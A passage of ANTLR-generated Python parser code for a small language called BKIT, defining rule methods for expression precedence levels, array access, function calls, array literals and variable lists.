BKITParser.RULE_expr1\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr1\" ):\n listener.enterExpr1(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr1\" ):\n listener.exitExpr1(self)\n\n\n\n def expr1(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr1Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 32\n self.enterRecursionRule(localctx, 32, self.RULE_expr1, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 250\n self.expr2(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 257\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,15,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr1Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr1)\n self.state = 252\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 253\n self.match(BKITParser.BIN_LOGICAL_OP)\n self.state = 254\n self.expr2(0) \n self.state = 259\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,15,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def expr2(self):\n return 
self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def ADD_OP(self):\n return self.getToken(BKITParser.ADD_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr2\" ):\n listener.enterExpr2(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr2\" ):\n listener.exitExpr2(self)\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 34\n self.enterRecursionRule(localctx, 34, self.RULE_expr2, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 261\n self.expr3(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 268\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,16,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 263\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 264\n self.match(BKITParser.ADD_OP)\n self.state = 265\n self.expr3(0) \n self.state = 270\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,16,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr3Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = 
parser\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def MUL_OP(self):\n return self.getToken(BKITParser.MUL_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr3\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr3\" ):\n listener.enterExpr3(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr3\" ):\n listener.exitExpr3(self)\n\n\n\n def expr3(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr3Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 36\n self.enterRecursionRule(localctx, 36, self.RULE_expr3, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 272\n self.expr4()\n self._ctx.stop = self._input.LT(-1)\n self.state = 279\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,17,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr3Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr3)\n self.state = 274\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 275\n self.match(BKITParser.MUL_OP)\n self.state = 276\n self.expr4() \n self.state = 281\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,17,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr4Context(ParserRuleContext):\n\n def __init__(self, 
parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def UN_LOGICAL_OP(self):\n return self.getToken(BKITParser.UN_LOGICAL_OP, 0)\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr4\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr4\" ):\n listener.enterExpr4(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr4\" ):\n listener.exitExpr4(self)\n\n\n\n\n def expr4(self):\n\n localctx = BKITParser.Expr4Context(self, self._ctx, self.state)\n self.enterRule(localctx, 38, self.RULE_expr4)\n try:\n self.state = 285\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.UN_LOGICAL_OP]:\n self.enterOuterAlt(localctx, 1)\n self.state = 282\n self.match(BKITParser.UN_LOGICAL_OP)\n self.state = 283\n self.expr4()\n pass\n elif token in [BKITParser.ID, BKITParser.UN_OP, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 284\n self.expr5()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr5Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def UN_OP(self):\n return self.getToken(BKITParser.UN_OP, 0)\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def expr6(self):\n return 
self.getTypedRuleContext(BKITParser.Expr6Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr5\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr5\" ):\n listener.enterExpr5(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr5\" ):\n listener.exitExpr5(self)\n\n\n\n\n def expr5(self):\n\n localctx = BKITParser.Expr5Context(self, self._ctx, self.state)\n self.enterRule(localctx, 40, self.RULE_expr5)\n try:\n self.state = 290\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.UN_OP]:\n self.enterOuterAlt(localctx, 1)\n self.state = 287\n self.match(BKITParser.UN_OP)\n self.state = 288\n self.expr5()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 289\n self.expr6()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr6Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def array_cell(self):\n return self.getTypedRuleContext(BKITParser.Array_cellContext,0)\n\n\n def expr7(self):\n return self.getTypedRuleContext(BKITParser.Expr7Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr6\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr6\" ):\n listener.enterExpr6(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr6\" ):\n listener.exitExpr6(self)\n\n\n\n\n def expr6(self):\n\n localctx = BKITParser.Expr6Context(self, self._ctx, self.state)\n 
self.enterRule(localctx, 42, self.RULE_expr6)\n try:\n self.state = 294\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,20,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 292\n self.array_cell()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 293\n self.expr7()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Array_cellContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr7(self):\n return self.getTypedRuleContext(BKITParser.Expr7Context,0)\n\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_array_cell\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterArray_cell\" ):\n listener.enterArray_cell(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitArray_cell\" ):\n listener.exitArray_cell(self)\n\n\n\n\n def array_cell(self):\n\n localctx = BKITParser.Array_cellContext(self, self._ctx, self.state)\n self.enterRule(localctx, 44, self.RULE_array_cell)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 296\n self.expr7()\n self.state = 301 \n self._errHandler.sync(self)\n _alt = 1\n while _alt!=2 and 
_alt!=ATN.INVALID_ALT_NUMBER:\n if _alt == 1:\n self.state = 297\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 298\n self.expr()\n self.state = 299\n self.match(BKITParser.RIGHT_BRACKET)\n\n else:\n raise NoViableAltException(self)\n self.state = 303 \n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,21,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr7Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def expr8(self):\n return self.getTypedRuleContext(BKITParser.Expr8Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr7\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr7\" ):\n listener.enterExpr7(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr7\" ):\n listener.exitExpr7(self)\n\n\n\n\n def expr7(self):\n\n localctx = BKITParser.Expr7Context(self, self._ctx, self.state)\n self.enterRule(localctx, 46, self.RULE_expr7)\n try:\n self.state = 307\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,22,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 305\n self.function_call()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 306\n self.expr8()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr8Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, 
invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr8\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr8\" ):\n listener.enterExpr8(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr8\" ):\n listener.exitExpr8(self)\n\n\n\n\n def expr8(self):\n\n localctx = BKITParser.Expr8Context(self, self._ctx, self.state)\n self.enterRule(localctx, 48, self.RULE_expr8)\n try:\n self.state = 314\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 1)\n self.state = 309\n self.operand()\n pass\n elif token in [BKITParser.LEFT_PAREN]:\n self.enterOuterAlt(localctx, 2)\n self.state = 310\n self.match(BKITParser.LEFT_PAREN)\n self.state = 311\n self.expr()\n self.state = 312\n self.match(BKITParser.RIGHT_PAREN)\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def array_lit(self):\n 
return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterOperand\" ):\n listener.enterOperand(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitOperand\" ):\n listener.exitOperand(self)\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 50, self.RULE_operand)\n try:\n self.state = 319\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID]:\n self.enterOuterAlt(localctx, 1)\n self.state = 316\n self.match(BKITParser.ID)\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.enterOuterAlt(localctx, 2)\n self.state = 317\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 3)\n self.state = 318\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_callContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return 
self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_call\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterFunction_call\" ):\n listener.enterFunction_call(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitFunction_call\" ):\n listener.exitFunction_call(self)\n\n\n\n\n def function_call(self):\n\n localctx = BKITParser.Function_callContext(self, self._ctx, self.state)\n self.enterRule(localctx, 52, self.RULE_function_call)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 321\n self.match(BKITParser.ID)\n self.state = 322\n self.match(BKITParser.LEFT_PAREN)\n self.state = 333\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.UN_LOGICAL_OP) | (1 << BKITParser.UN_OP) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 323\n self.expr()\n self.state = 328\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 324\n self.match(BKITParser.COMMA)\n self.state = 325\n self.expr()\n self.state = 330\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 335\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 336\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Index_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACKET(self):\n return 
self.getToken(BKITParser.LEFT_BRACKET, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_BRACKET(self):\n return self.getToken(BKITParser.RIGHT_BRACKET, 0)\n\n def index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_index_op\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterIndex_op\" ):\n listener.enterIndex_op(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitIndex_op\" ):\n listener.exitIndex_op(self)\n\n\n\n\n def index_op(self):\n\n localctx = BKITParser.Index_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 54, self.RULE_index_op)\n try:\n self.state = 347\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,27,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 338\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 339\n self.expr()\n self.state = 340\n self.match(BKITParser.RIGHT_BRACKET)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 342\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 343\n self.expr()\n self.state = 344\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 345\n self.index_op()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ArrayContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_array\n\n 
def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterArray\" ):\n listener.enterArray(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitArray\" ):\n listener.exitArray(self)\n\n\n\n\n def array(self):\n\n localctx = BKITParser.ArrayContext(self, self._ctx, self.state)\n self.enterRule(localctx, 56, self.RULE_array)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 349\n self.match(BKITParser.ID)\n self.state = 350\n self.match(BKITParser.ASSIGN)\n self.state = 351\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_dataContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT_LIT(self):\n return self.getToken(BKITParser.INT_LIT, 0)\n\n def FLOAT_LIT(self):\n return self.getToken(BKITParser.FLOAT_LIT, 0)\n\n def STRING_LIT(self):\n return self.getToken(BKITParser.STRING_LIT, 0)\n\n def BOOL_LIT(self):\n return self.getToken(BKITParser.BOOL_LIT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_data\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterPrimitive_data\" ):\n listener.enterPrimitive_data(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitPrimitive_data\" ):\n listener.exitPrimitive_data(self)\n\n\n\n\n def primitive_data(self):\n\n localctx = BKITParser.Primitive_dataContext(self, self._ctx, self.state)\n self.enterRule(localctx, 58, self.RULE_primitive_data)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 353\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << 
BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Array_litContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def primitive_data(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Primitive_dataContext)\n else:\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,i)\n\n\n def array_lit(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Array_litContext)\n else:\n return self.getTypedRuleContext(BKITParser.Array_litContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_array_lit\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterArray_lit\" ):\n listener.enterArray_lit(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitArray_lit\" ):\n listener.exitArray_lit(self)\n\n\n\n\n def array_lit(self):\n\n localctx = BKITParser.Array_litContext(self, self._ctx, self.state)\n self.enterRule(localctx, 60, self.RULE_array_lit)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 355\n self.match(BKITParser.LEFT_BRACE)\n self.state = 370\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << 
BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 358\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 356\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 357\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 367\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 360\n self.match(BKITParser.COMMA)\n self.state = 363\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 361\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 362\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 369\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n\n\n self.state = 372\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def var_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return 
self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_list\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterVar_list\" ):\n listener.enterVar_list(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitVar_list\" ):\n listener.exitVar_list(self)\n\n\n\n\n def var_list(self):\n\n localctx = BKITParser.Var_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 62, self.RULE_var_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 376\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,32,self._ctx)\n if la_ == 1:\n self.state = 374\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 375\n self.var_init()\n pass\n\n\n self.state = 385\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 378\n self.match(BKITParser.COMMA)\n self.state = 381\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,33,self._ctx)\n if la_ == 1:\n self.state = 379\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 380\n self.var_init()\n pass\n\n\n self.state = 387\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def primitive_data(self):\n return 
